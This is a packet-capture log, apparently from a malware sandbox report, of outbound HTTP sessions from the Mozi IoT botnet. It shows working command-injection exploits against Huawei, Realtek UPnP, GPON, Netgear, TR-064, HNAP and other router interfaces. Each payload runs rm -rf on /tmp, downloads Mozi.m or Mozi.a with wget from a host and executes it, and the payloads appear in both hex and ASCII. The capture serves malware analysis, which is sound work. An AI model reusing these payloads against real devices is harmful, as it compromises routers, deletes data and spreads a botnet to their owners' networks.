                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              117192.168.2.2358484141.80.218.9737215
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265464067 CET821OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                              Host: 141.80.218.97:37215
                                                              Content-Length: 601
                                                              Connection: keep-alive
                                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              118192.168.2.234188862.217.115.18237215
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265494108 CET822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                              Host: 62.217.115.182:37215
                                                              Content-Length: 601
                                                              Connection: keep-alive
                                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              119192.168.2.234540450.91.199.949152
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265522957 CET929OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                              Host: 50.91.199.9:49152
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              120192.168.2.2341280215.50.246.238080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265544891 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:8080
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              121192.168.2.235540289.213.177.17037215
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265578032 CET822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                              Host: 89.213.177.170:37215
                                                              Content-Length: 601
                                                              Connection: keep-alive
                                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              122192.168.2.2341766179.117.226.19480
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265593052 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              123192.168.2.234297490.197.2.275555
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265616894 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:5555
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              124192.168.2.2356246152.117.85.25380
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265641928 CET803OUTPOST /HNAP1/ HTTP/1.0
                                                              Host: 152.117.85.253:80
                                                              Content-Type: text/xml; charset="utf-8"
                                                              SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              125192.168.2.235096423.113.105.2098080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265659094 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              126192.168.2.23462529.70.45.22749152
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265687943 CET929OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                              Host: 9.70.45.227:49152
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              127192.168.2.2343262113.146.56.7949152
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265723944 CET931OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                              Host: 113.146.56.79:49152
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              128192.168.2.2342856108.85.179.16049152
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265753984 CET932OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                              Host: 108.85.179.160:49152
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              129192.168.2.2333938202.202.168.648080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265774965 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              130192.168.2.2360024195.246.106.1948443
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265789032 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              131192.168.2.233731447.69.248.1249152
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265821934 CET930OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                              Host: 47.69.248.12:49152
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
